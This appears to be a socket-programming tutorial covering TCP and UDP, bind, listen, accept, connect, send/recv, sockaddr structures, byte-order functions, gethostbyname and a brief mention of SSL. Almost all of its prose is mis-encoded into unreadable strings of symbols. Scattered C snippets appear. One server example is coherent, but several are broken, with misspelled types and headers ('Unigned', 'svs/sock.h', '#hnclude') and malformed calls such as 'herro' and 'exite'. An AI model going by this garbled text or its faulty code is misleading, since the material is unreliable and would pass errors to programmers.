# @0 (5 H U# < b' B' N4 , 3 b' , 3 B'T < ) < ) , 3 < ) 7 , 3, F ,B B'- B'U# I/O \ L % ! a 6 5< $ , 3 B' * , 3 b' (con) I ) ) 6- & , < ) 3 = D) 2 0 < ' 2 _z ]% ' C H ,< 'G N4 b '$ 6- write() 15G k ) ", - % ! , ) % ' ' b. 6 ' R4 ? … B' N 4 … ? G j 5 .Y … B'T 7 4… ) GH ) % ' … ) GH ) % ' … 11b3 FIFO = … # 2 5< 26• T/ T, ) X ! % H , % ' F) 3 | ) ) 6 ) ?@ 2 7 !89 1P ) #P< ) ) ^P @ € , (I/O) ) ) 2 ^P - N@ 6, 5G #P< ^ P a •^ P • ] H ' 2 T 5G nP9 7 ) - 0, 2 N g ‰8: ), ?) " IP h @ ) _d * , , •^ P socket() 5 ˜4 g - < - <• &@ $, , $ &@ 0,< ,6 3 - Y - <? 6 ' ^P ' 7 3 ,G I ) #P < 6- , 6- 1P 7 B 5!_z , SB 9% ! 0, & , 3 ' 1P ( ,H [ 1P 7 , ? 1) ) + _O ?@ " 6- ' %5! P (Null) —14 5< % ', 56 ^ P ,< ( 5 + 7 4h @ 5< % ! 0, 5 " 6 6 '_d * %5! ? read() ] rece()) [ write() ] send() + _=1 ]W 3 ,6 3 ?56 $%P H B / 6 3 % ' - < 0, % ' " T) b < ,6* % ! ?@ ) W 3 & @ ' R4 % ' 3 3 ?@ " •" N •" - 62 " U4 ) TSAP : ) 2 7 !89 1P " ^ P ) 0 ,< ) ) ? " , /) % '2, #P < . 6 ) $, 3 6^ P 2 " 6 L* @" ? &56? B', 56CH < _% ' - < ] ) < " ) TG'^ P 2 , 0 (E - @" ? &56 : 1P @ " (, @ 6Y ) 0 , F) \ ) a ", P ! 'G \ ) 2 _0 , 0 < -, N1L \ 6 56 I " 56 1 ), 66 6 #5 \ \ 6* N \ ] 6 … 0 < 6 Y 2 7) Y $ \ -, TL ?), \ ) 2 ( Y2 &5 6 T A) 0, 6, ' 7 I 2t 5: ) S N` 6) 2t5: ! ( 6- 2 \ . ) P! ™Y/ , " $ (FTP) % 'T %# ) 4 TQ ? G 0, TCP A) ?56 (SMTP) # ) #1 6 T - \ " C GP 9) , 1P 15 / F) 6- 5> K6%# ) 4 ) 7 ,3 Q ? FS ! 2 `56) 6 (HTTP) 2 %# ) 4 6:3 ? FS c 6 6- 7 ! UDP ) TCP \ ^ P 0, < , -,< = G ( … ) j4 ) , \ , H I, 0 - ( 7 .Y T 62t 5: ^ P H %# ) 4 , " N56 0, " 13 ) S ! ) 6 TCP % # ) 4 0 H ) ^ P ˆ6 . %Q 6 H " $ 6- ?, " 3 A) 2 2 / 0 P CH B / \ # A) 5> 2 6" 78# (5 TL F) 6- )- ,6 3 ,6 3 (8! % ! + ) >' ,6 3 i: 6- " - Y % ! ^ P = G" 1P " UDP 0, S 6- 0, < ) $TL 2 5> L ) , 0 ,< & 1P " \ 1P 6- , #P < 6- P( DNS H- Y TCP 6% # ) 4 " - Y ) , ), < 1 ) 1P :3 0 UDP %# ) 4 ?), ) N 56 IP %# ) 4 ) , 5 +H ) ?@ 2 " c %P H CGP9 ) - ) 6- B # ) 4 TCP ,< - < C 8P H 6- < T T ! 5< / UDP 3 !& ( Y 3% 5 C 85! 
= G U TCP %# ) 4 7 K &F ?,< E $^ P H F ?), " | -, 6 U ) ( Y G ,< '9 ) 9P \) < I.1 " 6 F % H ^ P 2 ' 9 R 1$ < # ^P 6 ^P 2 0, < - 0 % ,6 3 = G (8! % ! š7 ^P 2 6- < #P < ) 4) 2 6- M 9) R4 ?# # 2 ^P C 85! 1P 3% 5 YB^ P -, \) < $2 '9 1P $^ P A R4 7 C, ! H • • 0 ' ,6 3 ( •-, 6 U ) 0 ^ P -, •_- \) < ?@ I ) ] a 0 2 7 !89 % 5 ) @) ), SB 9 , , " R4 R4 5! = G ) 4 Client c C ) 4 Server -, 6 U ) 3 !89 , /) $ X task , 5 I ) RN V < 7 !89 0,6, % . I $- 7 P! I T /2 ! - )- ? ) 3 F 3 O) -, 6 U ) O) 7 .Y S1H ) )- 5 < SL -, 6 U ) ?@ A" -, 4 " U4 )- 2< ' \) < -, 6 U ) H) TQ ? G !89 7 .Y 2 " 0, 5 T ) " 2* X X 2 ) 5 v 4 ("c -, 6 U ) ^P H B 1/ 2 P 5 X , 5 T I S v 4$X 0 7 !89 3 $" ) ,< ,G , 2< ;. , ) -,< +" 6 5 6 / 7) Y < ) N] 0 6 ^P % M 9 ,G 0, 6-, 6 U ) ,G C c 5G 2# 1 _0, ) N* 4 $7 !89 S/ , * H -, , T I Y , N I N M 9 – …-, 6 U ) 5 –, 5 T * 4)j N ;. 5 … 4 B F TQ T \X I : -, 6 U ) 0 5 3 ,6 3 7) Y $ < % $ a % ! b' \ % ! % ! , b. F $ 0, + b (5 2 0, 6, , -, 6^ P ? 6X A R4 I ' % <+ 6- ) >' , TCP ^ P Q ,/ , 6X 4 E " < A) 2 G Q ,/ ? G % ! ,< ( E bind() ) TCP TCP 5 6 6 $ " 5 ,< ,G B / _z 2 0, 5 \) < TCP ,< ,G ^ P A R 4 (8! , ' F )T ) -, < ' R4 ? &56 , " U# _O < (8! % ! b ^P ^P ,6 5< ( E listen() G ) " - Y -, 6 U ) , 3 + b ( UDP 4 - 5< UDP A (8! " / 4h @ , 3 , - 0, ,G 2 G C c 5G 0, < A" TCP ) < ) A R4 TCP 7 9P - / &1bind() 2#5 ? 3 2 _=1 = G, " 4h @ 7 5< L* 2 'G W 3 7 ,G #B 3 H ] 0, _0 ^P P 7 5 5 ( E Socket() 5 - 5 < ? <,L R4 ? G < ^P (8! % ! : 5< I -, 6 U ) 'G ( UDP 2 0, K5 ) # @ " %P H 2 `56) -, 6 U ) "7 B 5! 0 < 5 1 5 0, ) ( Y F T/ › (E B / 2 56 |-, 6 U ) 5 ,6 3 , " E ,! F N1 a K5 , 5 6X H 0, N ("c >' :, ,G 2 , 1 )$ 5< 0 7) Y ^ P 2 , T G') " 7 , L L $? &567 L , 7) Y B' , G " < -, 6 U ) ) 2, )@ 6" 7) Y ^ P 2, Q ,/ ,G % ' 0 < " ? &56 : 5< ? G 0,< b , < ] nB G 7 9P " , X " accept() + - Y % ! Y D 7 # accept() + 0, % >Y 'G 5< C _ _ F) 7 0,< ,6 3 0, K5 - Y 0 ,6 3 5 recv ) send 7 1P R4 ?# A) ) 2 0, 6, 5 3 _ close() + b ] ' _ shutdown() + b ] ' )T _- ^P C _) '9 ) ^ P +:H … 7 B 5! " # ':# +:H … a < T5! 
% ! b' E 0, ) F $ ^P 0, P 7 4h @ 3 U) ^P -, 6 U ) H , 56 -,< (8! ("c ,G B / , F) bind() " - Y X A 3 #B$ ? N " ^P connect() 5 ?@ 5 _=1 6^ P = G , " -, 6 U ) 5 L* _O )&1 G , 6, + " - Y X X I ?@ , ,< -, 6 0, TCP ^ P 0 H 9P 2 TCP 7 9P 5 _ Hand Shaking] B / ( E ) \) < 1 C 85! connect() R4 < 2 M 9 1 ),< 0 ( , H 6- H ' )T ' G 'X $ &@ ˆ 6?), , %/ $, < " bind() + " - Y ,6 * ("c TCP ^ P # ^ P -, Y < , 93 C,E 3 7 4 - 5< \) < ' connect() %5! ) -, 6 U ) 0, 5 0, 5 ( ,H 60, 5 +:H '9 '9 ) 7 ' T shutdown() send() ) recv() + close() + " _z ^P _ ?@ H) 5 -, 6 U ) " 5 6 1) ) + B 2 `56) 60 6, ("c ?5 3 6C _0 , ^P \ 6, \F u $ "= G `56) ?@ - N G H ) i. H 6- " g@ • L* •$- N \ 21 ) ) H- Y a,< L* $^ P = G C 8G'0 ?5 3 .$ ,! ` -, 2 $% ' - < , 56 ) 47 4h @ 3 ?@ G:H ( 5 ] 0 ?5 3 " 6 u " U4 H P " N1 H - " , A Int A; \ 2 ) ^ P M 9 2 < IPh @ 3 a "7 Struct Sokaddr { Unigned Shortsa_family ; /*address family AF_xxxx*/ Char sa_data[14] ; /*14 bytes of protocol address*/ }; 2 G & 2 / R 1œ ' , 6 3 \ , 6 #P< d* B #) 4 ) TCP/IP % # ) 4 N 0, #P< ;. 6 $ IP h @ $7 ) 7) Y 0 < 5 -,6 ! 5E 5 2G [ 3 - 3 & 2 Appletalk %Q ,6 3 7) Y 4h @" , B #) 4 8G'0, C AF_INET 0 N I %L'2 % d* 3 a sa-family … - ) ) ) #P< 7) Y 0 \ 2 a sa-data … - 6, B'2 c = G 1 ) ) )Y = G 1 ) B PH # T G CH a, N - < - *1 ( , Struct sockaddr_in { 'G ` 6" , 5< /*address family*/ Shortint_family ; Unsigned shortintsin_port ; /*port number*/ Structin addrsin_addr; /*internet address*/ Unsigned charsin_zero[8]; /*same size as struct Sockadda*/ #P< ), 2 G - 3 d* # I ) 8! ?), $i. d* ,! C 8 , 56a Sin_port … [ , ) ,B'2 a Sin_port … ) 47 4h @$ A 3 ,B'2 0, % 3 < AF_INET 0,< 0, 5 B P H 2 < IP h @ a In_addr … I , , b '$, < , 6 3 = G 0 Y , , B #) 4 8 C , 6 #P< ( 5 <= G , ( Y l'# IP h @ C 8G' h @ T 9 6 #P< " - 62 a Sin_zero [†] … 6 ?@ $,B'2 2 #P < N #P < Y C 5 memset() % Q G 9 F) % 1 0, < ) -,< - Y T G 7 0,< - Y % H #P < 3 1/ 6 ` , C5 / 1 ) 0 < $7) Y B #) 4(5 ) 7 4h @ " N62 'X 0 62 , 0 < " (, 6$+ 3 ' ? 
= G " - Y \ 5E ) , T G CH 1 ) N B P H ` F •\ n : • 0 ?@ 3 -,< = G in_addr ( N ) # () ,6 3 , 5 H # @ / () # = G 0 "7 /*Internet IP address (a strcture for historical reason)*/ Struction_addr { Usigned longs_addr ; l '7 IP h @ ?@ = G ) ?@ 9 0 2# 1) , B P H # T/ 6 - Y <) 5< - *1 I'/ 5< ,6 3 6 a < F - 3• 3 2 1 6,/) S < SL " LE \ " < 6 , - m.1" G < 78# _- < 7) Y <R -,< n' DE 7 H) R1 S E! 5 6, B' F) LE \ ) BE \ H #P < ) c , ,< - < ) , B'2 'G unsigned long 6" , 7 5B " I 1 ) 0,< , 6 3 'G ) % $, -, < = G c 7 %# ) 4 N TCP/IP S LE ) 3 < H) TQ ? ! 0 3 Struct sockaddr_inas ; As.sine_port=0 xb459 ; " U4 R1 H A" I _- P< CG:H )] 4 ?@ " ,G ) < - 3•T) A" 7 4 h @ TCP "7 ? ) 2 2' H a,< ,6 3 B4 59 ) + , 6, H 6, B'?) , 'G % 1 2 56 0,< a S ) X U htons() a BE 1/ htonl() a BE 1/ ntohl() a 2 < H) 2 ) 2< \ ? N #P <U ntohs() a 2 < H B G' 1/ BE " B G' 1/ BE " & ? ! " ) 7 5B % ,P + 7 5B % ,P + ) 7 5B % ,P + 7 5B % ,P + , , A SL " ) F- Y 6, B' 2< ? 3 ("c U LE 7 H " %PH C 5 /? 0, - Y l '+ IP TCP , I ,B'C < - Y l '+ sin_family , B' sock_addr_in ` -, < = G % ! l '+ " <@ l '+ ,B'2 ) " H) b'a R T Q? ! < I H ("c , B'2 6 , - Y < 6 3 [ AF_INET , R 1$, < ,6 * % 1Q #P < ) ) 0 5 - Y a 6, B' IP S1H @ < h @ ,B'?) IP h @ I 78# , IP •2 6h @ ;.P a, < < 6- pwwžwwžw‹qžw{p ,! IP h @ ,B' sock_addr_in ` IP 3 @O L F "+ ) 2 1/ 4 long \ " ,! < a ‹‹žwwžwpwžw†} ( ' , B' BE S1H < ,! % ,P R1l ' + 2 a inet_addro() + … U4 ) < h @ c TQ 0 h @ 7 L G ,6 B P H + % 5! U#! + 2 ainet_ntoa() + … (E IP h @ < ) struct in_addr \ " l '+ H 9 7 L ) ) 4 0, 5 a " TQ BE S1H @) ' % ,P $0 = G : < \ ?@ F) 3 printf (%s , inet_noet_ntoa (ina.sin_addr) ) ; k F) 3 ) - G ) : < 7 L h @ a "( ' . l 'TQ F) 3 C 8Q 0,< ,6 3 wqžŠžw‹wžwsq IP h @ www.ibm.com ( ' -" / )= ("c + G , ?@ " % P H0 @ % ,P N N @ * 6 3iX b. 0, < = G ^ P _ TCP P] -, 6 U ) H - Y + Socket() + a "7 + B( ' #include <sys/type.h> #include <sys/socket.h> intsocket ( intdomain,int type,int protocol ) ; - <C 8PH . I AF_inet 0 < \ , , , , (8! Type , B' ?@ , 3 -, 6 ? [ , $ ? 
6 *1 #P <U \ \ 0,< ( \ " H sock_stream ) 6, I ? I %# ) 4 0 #P< . ,6 56 H( #P< 6 ) T) 6, B' 0 –, G + ?@ " " R 1_% ' , 0 Ÿ + 2 N <- Y , ,N H , F) 3 C5 / , YD U + 256 F) 3 :3 - 5 < error " ? G 5 <) ,< , 6 3 'G + , , + :3 - 5< A" < 7 B 5! u ,< …w , socket() + Perror() 5 56 5 3^P ' %5! ,< …w socket() + , ) ) - P& @ , [ - < % Q C H ] ,< ,6 3 - Y 0 < =H ,6 3 ?56socket() + b L* L* a Protocol … < - 5< ,B'2 Y ?@ , [ I Sock_DGRAM 0, , ,< a type … 42 \ ? 6 *1 3( 4 2 a domain … 6 , 4 0,< H) - 5 ) , = G " + ) u ) 2 0 -, @ 1Q ?@ # A) 0, 6 a Bind() + ^P y b'5< bind() + 0 h @? -, P 0, 5 6 a, H (5 , ,6 - 5< , < "- 0, 5 = G 5 c 5G C •-,< " 7 4 ( c 5 / = G2 C U4 " Bind() + n 9 " W 3 7 4 - 5< ^ P http %# ) 4 TCP ) A" H) ˆ 6" 6 1 ), - j6 3 % ! †q 7 4 B . 2< % ! G -, 6 U ) 5 A 5< 1P B 5!• , ,6 5< G2 " ( E 6- F ) UDP TCP / < 6 4) 6X Y 2 `56 H) TQ ? G ( 5 $-, 6 U ) % .$ †q @ ,L " 7 L bind() + a 7 4 B( ' #include<svs/type.h> #include<svs/sock.h> int bind ( int soskfd , struct sockaddr_mv_addr , int addrlen ) 0, - " socket_] + " - Y 0, 6, B . P " h @ L* -,< " 5< , 6 3 < IPh @ ) 7 4 h @ $ - 3 % ! @)- - N@ O* 0 S / =:1" 13 @ < I Y ' L - 5< My_Addr ` - < , 7 $ •ŠŠsŠ 5< F) 4 h @ , B' 2 3 0 3 T 9 a Addr_len … # Bind_] + U# wqp‹ - 5< " 7 4 0, / a My_Addr … ` 0,< = G C 8P H ` a ?56a sockfd … 8P C H I b . _= 1 @2 - 5< ? ! 2 , < wqps -, < ) " # Y 2 6-, 6 U ) 0 ,6 * ? ?@ )z * ) 4 , P 5< , _O 6-, 6 U ) 6 I INADDR_ANY $, , & 4 - 5< 4 2 " -" F % ! IP h @ , B' [ , IP h @ 5< B . 2< ) U# 37 b. % ! 0 c 6, B' 6 ?@ , % ,P BE 1/ 1/ Y , 1/ ) , Y N- 3 ?@ ?@ HTONS_] + , ) 6a - ) " 3 5 <" % P H " ' Bind_] % 5! - N@ , < u $ :3 \ A" 0, 4 , # ("c 2 " 4 5< ?@ 5< G , % ,P 3 ,6 3 " H #_ O* Bind_] 0 ,6 3 - ?@ % 1 0,< N - N@ 2#5 0 - _z …w , _- G ,< ) - P& @ PEAAOR_] + ) :3 - 5< Errno :3 7 L* a Listen_]+ (8! - ^P % ! + 2 b TCP ^ P 6X 0 ), 7 P! _+ N I )- = I.1 $-, 6 U ) , 6, 7 4h @ + b 0,6, G] , G ? I R H 6U) ) " ) T G'7 9P @" = a "7 % ! , (8! 
) - < 7 4 - 5< H X , Q ,/ @)- 5 ,G Q,/ 6X I.12 " ", - " U4 TCP ^ P @^P )$ b'+ 2 TCP ^ P 0 F? " 2, A) G -, 6 U ) 2#5 ? " 6 9 F 7) Y ) 4 , , , % ! 2 H B / # < (8! % ! + #@ , Listen_] B ( '0,< W 3 7 4 - 5< Int listen (int sockfd , int back log ) ; 0, - E ?@ , L* ?56a Sockfd … 5 " 0 I -, < = 0 erno u ) ,G Q ,/ a Backlog … ) nB G 7 9P , 6 3 …w+ 2 , backlog , -,< ),. pq :3 ") 7 B P H+ 0,< - ,3 , 56 :3 - 5< Accept + a < H ?@ ( Y - < ) _] + ) 4 TCP ^ P 6 H) 0 < 2 " , M 9 7 B 5! , PB : + b % ! >/ / @)L* T) L* F accept accept() 0,< 0,6, % 1 2 56 ,6, ( E 5< E () L* nB G 7 9P " I -,< = - Y nB G 7 9P " 7 9P % -,< = ("c 0, , accept() ) -, @ 2 7) Y 0 # A R4 T) L* 2 ) 7 !89 T 0,< 6X 2 € - Y ] ) # -,< = , ,F accept() + , " U4 < O* % ! 0, , + 2 $ ' R4 _ F) 7 # nB G 7 9P 2 " , , ,F 5< " ,< F listen_] + X " 5< ) 4 7 L* @)- I < - N nB G ) -,< = X % .% ), ) ' 7 9P " " _=1 / () " _O # L* a 0, 2 0, "7 + B( ' #include <sys/socket.h> int accept ( int sockfd , void*addr , *addrlen ) ; 0 T Socket _] + -, @ + 2 M 9 IP h @ ) 7 4? ! 2 L* @ 5< 4 h @ nB G^P 0,< 'G C 8P H # , 3 - < a Addr … ` A R4 " U4 % ! 
 0, 5< S / addr a Sockfd … ?@ ` , ^P % T 9 a Addrlen … H- Y u ,G 1) :3 ?@ - 5 < a L* - Ÿ + 2 , :3 , < _…w] , 0 % H errno ,6 3 , B ?,< 2<) 0 "(5 TQ

    #include <string.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>

    #define MYPORT 3490   /* the port users will be connecting to */
    #define BACKLOG 10    /* how many pending connections the queue will hold */

    int main(void)
    {
        int sockfd, new_fd;             /* listen on sockfd, new connection on new_fd */
        struct sockaddr_in my_addr;     /* my address information */
        struct sockaddr_in their_addr;  /* connector's address information */
        socklen_t sin_size;

        if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) != -1) {
            memset(&my_addr, 0, sizeof my_addr);          /* zero the struct, sin_zero included */
            my_addr.sin_family = AF_INET;                 /* host byte order */
            my_addr.sin_port = htons(MYPORT);             /* short, network byte order */
            my_addr.sin_addr.s_addr = htonl(INADDR_ANY);  /* auto-fill with my IP (all interfaces) */
            if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof my_addr) != -1
                && listen(sockfd, BACKLOG) != -1) {
                sin_size = sizeof their_addr;
                new_fd = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size);
                if (new_fd != -1)
                    close(new_fd);      /* recv()/send() on new_fd would go here */
            }
            close(sockfd);
        }
        return 0;
    }

, ,F " 60, ' - Y $ T , N accept()+ b N ?@ L * recv()) send() + )- - Y % H 5 a ) -, 6 U ) "7 + ) 5 + ) 2 B ( '0, 6- 1P

    int send(int sockfd, const void *msg, int len, int flags);
    int recv(int sockfd, void *buf, int len, unsigned int flags);

0 -,< z * E@ " accept() + " -, @ 1 60, < _ ` T 0 Y ?@ b' 6 B . a Msg … @ %Q] I'/ H TCP ) ' S / ' 2 ;. 5 iX a Sockfd … L* " - 1 ,B'?) ) T 9 a Len … 6- a Flag … , `4 " & 6 4 0, RN ' 6- B . h @ recv() + I'/ 0 7 1 ) 0, , 6 3 …w :3 d* X S / len u 6") ' ,G -, " ) ' 7 1 ' 4 2 a Buf … H E@ + ) 2 6 , ,G $ PQ ,! 1 ,G 2#5 , H 0,<P? # , + , H wqqq , len 1 ), - ] 1 6- % " †qq 7 0, d * 5< , 2 @=B # , send() + b T /, # T u 6- e 'TQ ? ! 0, < pqq 5< -, -, E/ , H _ ' G B / 6 a 0,< \ ? 6- 6 ) A /) b 'recv() ) send() + a # ' )T ) UDP A) ( B , 63 1 ) œ, P , , T shutdown()) close() + , 5 ' T - 0, , P ) < N" ^P , ^P ,< M 9 ? " , , < " " ? " 6 B', 562# 1 ) a close()+ "7 B( '

    close(int sockfd);

+ L* + b ,< ? 56 sockfd L* 0,< ,6 3 - Y % H ' 2 0 I & )T a Sockfd … L* , H 0 accept() -, socket() I ) nB G 7 9P ( 5 N close() + b < 9P 0 % !
7 9P = a TCP 7 9P " ), A" 4 $- # TP H / ,,P N ^P - X 6 ?@ F , 0, 'X nB G ?@ B ( ' ,<P shutdown() + "7 ,6 * 2 N - Int shutdown (int sockdf, int how); 0 I a " ? `56$- R4 " , T 1 ) " 0, 6- "@ ' "@ 8 C g - ' a Y ) ) '% ! 2#5 g - 2#5 g ' , 6 3 …w + 2 , 0, _TCP %# ) 4 . a, -, 6 U ) H- Y 5 , G A" :3 ") 4 0 aw , … 0 " ? `56 )T ap , … %5! close() + 0, 5 u ) , … T F) 3 ' % ! - A) a How … 2 ^ " ^ , 56 1/ 2 0 < # 2#5 ?@ 1/ 0, " a Sockfd … L* 7 B P H+ , 56 :3 - 5< errno P] - Y 4+ , , < 'G 5 P, + G T/ 0, < E - Y + " # 0, ) + 2 F) -, 6 U ) ) Yˆ 6 E 0, Y -, 6 U ) < 5 connect() + b (E , F) 5 - Y 6- ^P H %5! 2 < ' R4 X ' 0, , Pshutdown () socked_] X -, 6 U ) C 5 " 2 0,< ,6 3 0, CH , _=1 - Y ,< 'G B P H j* 0 ?@ ) , , ( N6 _O , < I ,H iX recv() ) send() + )T close () + b 5 " _z -,< E ^ P C _ connect + ) < listen () + 0 connect () + " -, 6 U ) - Y ) ,< -,< F I ,6 3 & @ ' + 2< ^P ) -, 6 U ) E - N@ , < -,< a H accept () ) 3 ' connect () + "7 B( ' #include <sys/types.h> #include <sys/socket.h> int connect (int socket, struct sockadr* serv_ addr, int addrleny); 0 Socket() + -, @ ` 2 3 ' Sockdf \ " 0, < 'G C 8PH 0,< ,6 3 2 G ,L / ? ), #B, - 5 <2 %L , ? ! h @% 5< 5 S / I ), 0, ? O* 5< -, 6 U ) / (8! % ` a Serv_addr … 0 2< IP h @ -" , : Addrlen … B P H ` H sizeof(struct sockaddr) -, 6 U ) 4 h @ ? 56 a SOCKDF … 7 4 h @ ) ,L 'G 0 % ! L* 3 7 4 h @ 5< 5< , 42 H # 2 ' L 7 4 - 5< H) v 4 , 8 C R4 X 3 9 5 2 -, 6 U ) ), < - O* % ! ,6 3 M 9 & 3 7 4 h @ $^ P -, \) < ^P , ,< d * ) [, C G:H -, 6 U ) 7 4 0, 5 \) < , 6 3 …w + 2 TCP ^ P , 0,< H - :3 - 5< errno Ÿ UDP A) a( , , (E ( T /0 \ A R4 ) ) UDP A) \ ' (,! 7 ' u ) ' ' )T )T $T + ? 7 0 -, 6 U ) socket () + 4 3 ' 2 0, E ( 5 … \ " _=1 0 < ( E SOCK_DGAM _ bind() + ' - ]0, 6, GH h @] š ,P P ]0, ? I 6- 7 4 h @ -,< E ' I , 'X h @ ,< A" 4) ' - 0 ,6 3 R4 ?# T 0 < ( E sendto()) recvfrom()+ B _O ˆ 6?), _z H) _,6 5 ( GT ) -,< d * _7 4 )IP \ ' 0, , P )T -,< E C _ 5 4 ) socket 4) socket() + ] 0, E ( … \ " _=1 _ SOCK_ DGRAM] 0, 5 T -, 6 U ) , 6, 5 )T 5 G 6- 0, 5 T ? 
6' - $, < # <, N , 'X 1 ˆ6?), ,< " -, 6 U ) " 0, , P "7 ( 5 P- 5< " ' -,< E T 6_O # H) -, < 3 < -, 6 U ) 0, 6, ( E a - + _z B( ' Int send to (int sockfd, connect void* msg, int len, unsigled int flags, const struct_to, int tolen); 0 z * F socket() + -, @ E@ " 1 6- ( 2 0 -, 6 U ) Y d* 3 7 ?@ H UDP ) ' 0 0, N I H %. h @ a Msg … I'/ ( 4 2 ' 0 <T S / ?@ C 8G'$;. ?) 4 - 5 < 2 `56) , L a Flags … , ` 4 " &6 4 2< a TO … ` IP h @ , ^ ) -,< ( 4 T 9 a Len … 1 Sockaddr \ " 8PH C a sockfd … L* ` 0 < I size , sockaddr ` ?@ , I of (struct sockaddr) 0 T ,G send() + , 56+ 2 n' % ! , , 2 :3 , < _…w] # -,< T 6 T , ,G , 6X , errno # 6" 0, 5 0,< B / ") B1 T 9 a Tolen … H 0 u @T 2 `56) - "7 -,< ?@ :3 - 5< X ,G 3 2 C 5/ 0, N I a , ( P- B ' + & B( ' Int recv from (int sockfd, void buf, int len, unsigned int flags, struct sockaddr_ from, int_ from len ); 0 ,6 3 -, @ H %. ?@ F socket () + ' 6- ( % ! L* I'/ " a Sockfd … B . h @ a Buf … 0 _ S / ] < ' , 4 T 9 a Len … ) ,< ?@ 3 5< ) I ,P socaddr \ " ` a From … 7 4 h @ ) IP h @ 7 L* ?@ % ! 8PH C 0, 0, 0 A" 4 -, I ?@ % ! 42 0 -,< ' Y ?@ a Flag … ` T 9 a Len … ,G & + 2 0 / 56 , ' a #P < #P< , 0 63i 6 6 N + @2 5 " , Y+ -,< 'G 5 3 6- 0, + 6, @ " g ),Y a getpeename() + include<sys/socket.h> int getpeername(int sockfd, struct sockaddr_addr, int_addrlen); ) 47 4 h @ ) IP h @ % < $% -, < = G % •7 + 2 M 9 6 6, + 2 " - Y 4 0, 5 z * ^P % M 9 a I 2 0 -,< = G ?@ 0,< ,6 3 4 % 3 8P C H sockdaddr \ " M 9 7 4 h @ ) IP h @ % ! .sockaddr u ) , 6 3 _…w] , ` l '+ n 9" @ C5 / , ?@ , A 'U LE \ " 5 < 2 < 0, : Sockdf … ` a Addr … b ` T 9 a Addrlen … ' (, ! 7 :3 - 5< errno 0,< ,6 3 I :3 \ h @ ) IP h @ S L* 2#5 ) % ,P ,< - < ?@ # BE 7 7 4 Š j* G gethostname () + ( 2 $, ,6 3 $ < F ?@ ) _ www.ibm.com C 8Q) ?@ IP h @ 5< < ( + 2 2< 2 5 ( a TG < "7 + B( ' #include <unistd.h> int gethostname(char *hostname, size_ ); U4 _ < 7 P ! ] 6 " 0,< ,6 3 - 3• E @ 0 :3 - 5 < % P H , 56errno 0 2 , )- ") ,6 3 Y -, 6 U ) -" / ( , G 0, 5 ) ,L a b. 
3 E < E , )# K 1Q - Y ?@ IP h @ " C 5 e '2# 1) , h @? ! N 8P C H X N56 , 1 ) #B 5! " 9 ) DNS 5F H 5< , DNS @ 5F 0,< ;. ?@ ^P < T 9 a Size … , , %5! l '+ '?@ H) E " " :3 ,< _…w] 0, 5 - Y W 3 2< 2< ( + S / a -" / -, a Hostname … @ -, 6 U ) " B( ' -" / ( h @ , ,@ 2 #include <netdb.h> struct hosten * gethostbyname(const char * name); 0-, 6 U ) 7 ?@ 3 hostent \ " < a Name … -" / ( ` h @ $+ a , -,< = G " Struct hostent Char *h_name Char *_name Char **h_aliases Length ; ¡Int h Char **h_addr_list; }; 8Q C , 6 3 -" / ( < 2 #P< ] 2< ( a Hname … 5 _www.ibm.com _ < , , B'2 #P< 3 wq < 2 ] 2< , <- < ( a H_aliases … G 3 a H_addrtype … N 56] h @ - _0 < ,6 3 AF_INTEL S / h @ T 9 a H_Length … -, 6 U ) 2< ^ IP h @ ?@ 0 < , ` ), ` I errno < 0, - < u $? &@ - < B PH + M83 ) $? u 0 < ' :3 \ = ‰9 < 2 0 c + &@ ' 7 2 NULL , 7 herror 5 ) X TQ 3 |q ' 7 ,6 3 I I H _ addr_list… < u ?@ H g ) 2 g + 25X F) + 2 H , F ) ,< ,6 * herror() 5 a, H ) +' " F) #include <stdio.h> #include <stdio.h> #includer < errno.h> #hnclude <netdb.h> #include <sys/types.h> #int main (int argc, char * argv[]) { struct hosten * h; if(argc!=2){/*error check the command line*/ fprintf (stderr,” usage: getip address\n” ); exit(1); } if(h=gethostbyname(argv[]))==NULL){/*get the host info*/ herro(“ gethostbyname****_; exite(1); } printf(**** host name :%s\n” ,h-h_name); printf(“ IP Address :%n” , inet_ntoa(*((struct in _ addr * )h-h addr))); return.; } E )- ' ) )? ! 0, k F) 3 ) 'b3 ) ( ' Enter , B) < ) IP h @ 7 L* a ? getip -" / ( h @ 7 2 ( ?@ 5F " A" c " 7# 2, l ' 9_=1 13 B ' -" / ( B F U )- Œ aTQ 0, 6 $getip www. Ibm . com , IP +H ) h-addr-list u 6) @ #P< , -, < - 3•BE 7 ( Y : ' - < L 1 ) < ?@ T) 1/ F) 3 ) k T G IPh @_O -" / ( h @ 3 |q , < b '5 < , h @ % ,P 7 6 l' 8G' C 0, , " inet_ntoa() + " _pws 0w{q 0w†}žw‹q C 8Q] 0 in_ \ " ` P E 2 ?@ 0 ) )? @ inet_ntoa() + ) ,< = G ?@ 3 -,< •\ nP : • %5!_z %L' , addr 5 3 lY %5! 1 ) 2 5> ) ) 4 " •\ nP: • %5! 
0, ' Q $X SSL g( [Secure Socket LayerZ a – N& 5 3 6 T F 2 7 !89 T P '9 6, ) 6- 0, , < / 9 78# 2 " -,5! %# 5 $ 6- N ?,< nK' " . " , N& P ! 78# 2 0, ' P ! -,5! N& … ? 6? # ) " , 6 & , B) ,B , F ) , ,F 0 6 6 ( ? 21 ) 0, ) ) ?@ c ! 0 * & ( ) " N & A) ) 6 P. % H 6 ) " ?@ () %# F N& … N & , B? , B T P A) 2 %# 7 2 T %# 0, < - 4 1 g CP 6( 6 P . m.1 & 3 b' , F ?@ - 0, F A) 2 F j & " 0,< & A L3 , B ) M 9 " ( u4 , Gœ L3 , B) # & ) -,< B ), , < 2t5: F N& … %#< N& A) 6- . !89 , 6 * ? N ' n 9 @ ? )@ 5! , B " ? N ) , & A ? 59 ? 6? <& , B ) 2 " , T 3 , B) N,56 ) " N ,B ,B 5! , B ) bP 1 < 6 V ? 5! , B ) -, N & A) ) ? , , 6 #P < <) 0-, a" , – 0 2#5 L3 , B 0 < 2 5! , B ?@ , Z> - Y ( u4 ? " 5! , B n P : A) 2 0 < ?@ , * , u4 ,6 * ?@ D B %# A 0 ,B 3 " %# 2 %/ x 0 5! , B k F % / 0,< \, ? 5! N& …p %#< N % H"E g 6 'L ? E/ ? F b ,B & 5! , B -,< T, ) 1 , B" - Y ! 'L ? , -, m .1 ? , B 0, 0 < - U ), 7 !89 % ?@ " - Y ?@ N 7 !89 ? & n 9 " , & 7 !89 